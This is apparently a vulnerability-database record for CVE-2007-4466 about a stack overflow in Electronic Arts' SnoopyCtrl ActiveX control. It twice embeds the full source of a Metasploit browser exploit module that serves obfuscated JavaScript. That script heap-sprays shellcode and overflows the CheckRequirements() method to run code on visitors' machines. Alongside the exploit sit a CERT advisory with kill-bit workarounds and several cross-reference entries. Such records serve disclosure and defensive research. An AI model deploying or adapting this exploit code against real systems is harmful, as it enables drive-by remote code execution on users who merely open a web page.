Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow

{"id": "MSF:EXPLOIT/WINDOWS/BROWSER/EA_CHECKREQUIREMENTS", "bulletinFamily": "exploit", "title": "Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl ActiveX Control (NPSnpy.dll 1.1.0.36. When sending a overly long string to the CheckRequirements() method, an attacker may be able to execute arbitrary code.", "published": "2009-10-15T15:22:16", "modified": "2017-07-24T13:26:21", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.rapid7.com/db/modules/exploit/windows/browser/ea_checkrequirements", "reporter": "Rapid7", "references": ["#", "http://cvedetails.com/cve/cve-2007-4466"], "cvelist": ["CVE-2007-4466"], "type": "metasploit", "lastseen": "2017-07-24T19:43:19", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2007-4466"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl ActiveX Control (NPSnpy.dll 1.1.0.36. When sending a overly long string to the CheckRequirements() method, an attacker may be able to execute arbitrary code.", "edition": 1, "enchantments": {}, "hash": "455b60e05e39e82bfe6261567807e48a31df22c90c788e5b38e378bac85c620a", "hashmap": [{"hash": "f272ede97cb5ba25a3376b0d45ab307e", "key": "sourceHref"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "960b44c579bc2f6818d2daaf9e4c16f0", "key": "metasploitReliability"}, {"hash": "ce27a487ca75b71131ba1bb0c253a43e", "key": "published"}, {"hash": "c395fe4a959450392a61da84d5ada91c", "key": "references"}, {"hash": "1c970dfebe3aa7cca7fef994e63df2b9", "key": "sourceData"}, {"hash": "5820b7b314cb8318a81a9825ba95b7fe", "key": "cvelist"}, {"hash": "55b5356910ac097a7ddd6546ea6f7ee0", "key": "title"}, {"hash": "74798933f90c8c8a3dcac277d7c31e76", "key": "reporter"}, {"hash": "4b49e3617fc5d688d5449af18a42a788", "key": "href"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "type"}, {"hash": "8788f3b800bed80c52adbac4a95d8d15", "key": "description"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "0985258d1792e4ed79b59929c7f13762", "key": "metasploitHistory"}, {"hash": "423512f273f984ee3e9e1b9e85b20507", "key": "modified"}], "history": [], "href": "https://www.rapid7.com/db/modules/exploit/windows/browser/ea_checkrequirements", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/EA_CHECKREQUIREMENTS", "lastseen": "2017-07-02T23:24:36", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ea_checkrequirements.rb", "metasploitReliability": "Normal", "modified": "2017-05-03T20:42:21", "objectVersion": "1.3", "published": "2009-10-15T15:22:16", "references": ["#", "http://cvedetails.com/cve/cve-2007-4466"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl\n ActiveX Control (NPSnpy.dll 1.1.0.36. When sending a overly long\n string to the CheckRequirements() method, an attacker may be able\n to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-4466' ],\n [ 'OSVDB', '37723'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]\n ],\n 'DisclosureDate' => 'Oct 8 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload.\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Encode the shellcode.\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, \"or al, 12\").encode_string * 2)\n\n js = %Q|\n try {\n var evil_string = \"\";\n var index;\n var vulnerable = new ActiveXObject('SnoopyX.SnoopyCtrl.1');\n var my_unescape = unescape;\n var shellcode = '#{shellcode}';\n #{js_heap_spray}\n sprayHeap(my_unescape(shellcode), 0x0c0c0c0c, 0x40000);\n for (index = 0; index < 5000; index++) {\n evil_string = evil_string + my_unescape('#{ret}');\n }\n vulnerable.CheckRequirements(evil_string);\n } catch( e ) { window.location = 'about:blank' ; }\n |\n\n opts = {\n 'Strings' => true,\n 'Symbols' => {\n 'Variables' => [\n 'vulnerable',\n 'shellcode',\n 'my_unescape',\n 'index',\n 'evil_string',\n ]\n }\n }\n js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)\n js.update_opts(js_heap_spray.opts)\n js.obfuscate()\n content = %Q|<html>\n<body>\n<script><!--\n#{js}\n//</script>\n</body>\n</html>\n|\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ea_checkrequirements.rb", "title": "Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow", "type": "metasploit", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2017-07-02T23:24:36"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "5820b7b314cb8318a81a9825ba95b7fe"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "8788f3b800bed80c52adbac4a95d8d15"}, {"key": "href", "hash": "4b49e3617fc5d688d5449af18a42a788"}, {"key": "metasploitHistory", "hash": "0985258d1792e4ed79b59929c7f13762"}, {"key": "metasploitReliability", "hash": "960b44c579bc2f6818d2daaf9e4c16f0"}, {"key": "modified", "hash": "2ec197af284db8301f179ee5de907740"}, {"key": "published", "hash": "ce27a487ca75b71131ba1bb0c253a43e"}, {"key": "references", "hash": "c395fe4a959450392a61da84d5ada91c"}, {"key": "reporter", "hash": "74798933f90c8c8a3dcac277d7c31e76"}, {"key": "sourceData", "hash": "151e05debb855c9f4d0d6240e6c93825"}, {"key": "sourceHref", "hash": "f272ede97cb5ba25a3376b0d45ab307e"}, {"key": "title", "hash": "55b5356910ac097a7ddd6546ea6f7ee0"}, {"key": "type", "hash": "6719951e37a5b7c4b959f8df50c9d641"}], "hash": "6ae497636fd3afe07662e8327820867ccce08421e074ed96b822ae0e59cc2ddf", "viewCount": 0, "enchantments": {"vulnersScore": 7.5}, "objectVersion": "1.3", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ea_checkrequirements.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl\n ActiveX Control (NPSnpy.dll 1.1.0.36. When sending a overly long\n string to the CheckRequirements() method, an attacker may be able\n to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-4466' ],\n [ 'OSVDB', '37723'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]\n ],\n 'DisclosureDate' => 'Oct 8 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload.\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Encode the shellcode.\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, \"or al, 12\").encode_string * 2)\n\n js = %Q|\n try {\n var evil_string = \"\";\n var index;\n var vulnerable = new ActiveXObject('SnoopyX.SnoopyCtrl.1');\n var my_unescape = unescape;\n var shellcode = '#{shellcode}';\n #{js_heap_spray}\n sprayHeap(my_unescape(shellcode), 0x0c0c0c0c, 0x40000);\n for (index = 0; index < 5000; index++) {\n evil_string = evil_string + my_unescape('#{ret}');\n }\n vulnerable.CheckRequirements(evil_string);\n } catch( e ) { window.location = 'about:blank' ; }\n |\n\n opts = {\n 'Strings' => true,\n 'Symbols' => {\n 'Variables' => [\n 'vulnerable',\n 'shellcode',\n 'my_unescape',\n 'index',\n 'evil_string',\n ]\n }\n }\n js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)\n js.update_opts(js_heap_spray.opts)\n js.obfuscate()\n content = %Q|<html>\n<body>\n<script><!--\n#{js}\n//</script>\n</body>\n</html>\n|\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ea_checkrequirements.rb"}

{"result": {"cve": [{"id": "CVE-2007-4466", "type": "cve", "title": "CVE-2007-4466", "description": "Multiple stack-based buffer overflows in Electronic Arts (EA) SnoopyCtrl ActiveX control (NPSnpy.dll) allow remote attackers to execute arbitrary code via unspecified methods and parameters.", "published": "2007-10-09T18:17:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4466", "cvelist": ["CVE-2007-4466"], "lastseen": "2016-09-03T09:23:24"}], "cert": [{"id": "VU:179281", "type": "cert", "title": "Electronic Arts SnoopyCtrl ActiveX control and plug-in stack buffer overflows", "description": "### Overview\n\nThe Electronic Arts SnoopyCtrl ActiveX control and plug-in contains multiple stack buffer overflows, which could allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\nElectronic Arts (EA.com) provides an ActiveX control and Netscape-style plug-in called SnoopyCtrl. This control, provided by `NPSnpy.dll`, is included with an EA.com update package. The SnoopyCtrl ActiveX control and plug-in contains buffer overflow vulnerabilities in multiple methods and initialization parameters. \n \n--- \n \n### Impact\n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), a remote, unauthenticated attacker may be able to execute arbitrary code with the privileges of the user on a vulnerable system. \n \n--- \n \n### Solution\n\nWe are currently unaware of a practical solution to this problem. Please consider the following workarounds \n \n--- \n \n**Disable the SnoopyCtrl ActiveX control in Internet Explorer** \n \nThe vulnerable ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID: \n\n\n`{525A15D0-4938-11D4-94C7-0050DA20189B}` More information about how to set the kill bit is available in [Microsoft Support Document 240797](<http://support.microsoft.com/kb/240797>). Alternatively, the following text can be saved as a `.REG` file and imported to set the kill bit for this control: \n\n\n`Windows Registry Editor Version 5.00` \n \n`[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{525A15D0-4938-11D4-94C7-0050DA20189B}]` \n`\"Compatibility Flags\"=dword:00000400` **Disable the SnoopyCtrl plug-in in other browsers** \n \nThe SnoopyCtrl plug-in can be disabled in other browsers, such as Firefox, by removing the `NPSnpy.dll` file from the `plugins` directory. \n \n**Disable ActiveX** \n \nDisabling ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this and other ActiveX vulnerabilities. Instructions for disabling ActiveX in the Internet Zone can be found in the \"[Securing Your Web Browser](<http://www.cert.org/tech_tips/securing_browser/#Internet_Explorer>)\" document. \n \n**Disable plug-ins** \n \nDisabling plug-ins by default can prevent exploitation of this and other plug-in vulnerabilities. This can be accomplished by configuring [NoScript](<https://addons.mozilla.org/en-US/firefox/addon/722>) to `Forbid other plugins` for untrusted sites. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nElectronic Arts| | 04 Jun 2007| 25 Aug 2007 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23179281 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.cert.org/tech_tips/securing_browser>\n * <http://secunia.com/advisories/27143/>\n * <http://www.securityfocus.com/bid/25970>\n * <http://support.microsoft.com/kb/240797>\n * <https://addons.mozilla.org/en-US/firefox/addon/722>\n\n### Credit\n\nThis vulnerability was reported by Will Dormann of the CERT/CC.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n * CVE IDs: [CVE-2007-4466](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4466>)\n * Date Public: 08 Oct 2007\n * Date First Published: 08 Oct 2007\n * Date Last Updated: 09 Oct 2007\n * Severity Metric: 4.02\n * Document Revision: 13\n\n", "published": "2007-10-08T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.kb.cert.org/vuls/id/179281", "cvelist": ["CVE-2007-4466", "CVE-2007-4466"], "lastseen": "2016-02-03T09:12:50"}], "exploitdb": [{"id": "EDB-ID:16609", "type": "exploitdb", "title": "Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow", "description": "Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow. CVE-2007-4466. Remote exploit for windows platform", "published": "2010-11-11T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/16609/", "cvelist": ["CVE-2007-4466"], "lastseen": "2016-02-02T00:14:59"}], "osvdb": [{"id": "OSVDB:37723", "type": "osvdb", "title": "SnoopyCtrl ActiveX (NPSnpy.dll) Unspecified Method Arbitrary Code Execution", "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:27143](https://secuniaresearch.flexerasoftware.com/advisories/27143/)\nISS X-Force ID: 37020\nFrSIRT Advisory: ADV-2007-3415\n[CVE-2007-4466](https://vulners.com/cve/CVE-2007-4466)\nCERT VU: 179281\nBugtraq ID: 25970\n", "published": "2007-10-08T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:37723", "cvelist": ["CVE-2007-4466"], "lastseen": "2017-04-28T13:20:33"}], "packetstorm": [{"id": "PACKETSTORM:83110", "type": "packetstorm", "title": "Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow", "description": "", "published": "2009-11-26T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/83110/Electronic-Arts-SnoopyCtrl-ActiveX-Control-Buffer-Overflow.html", "cvelist": ["CVE-2007-4466"], "lastseen": "2016-12-05T22:20:51"}], "seebug": [{"id": "SSV-71123", "type": "seebug", "title": "Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow", "description": "Summary: \nElectronic Arts (EA) SnoopyCtrl ActiveX control (NPSnpy.dll)in the presence of multiple stack buffer overflow, a remote attacker can use that method and parameters execute arbitrary code.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-71123", "cvelist": ["CVE-2007-4466"], "lastseen": "2016-07-30T06:46:18"}]}}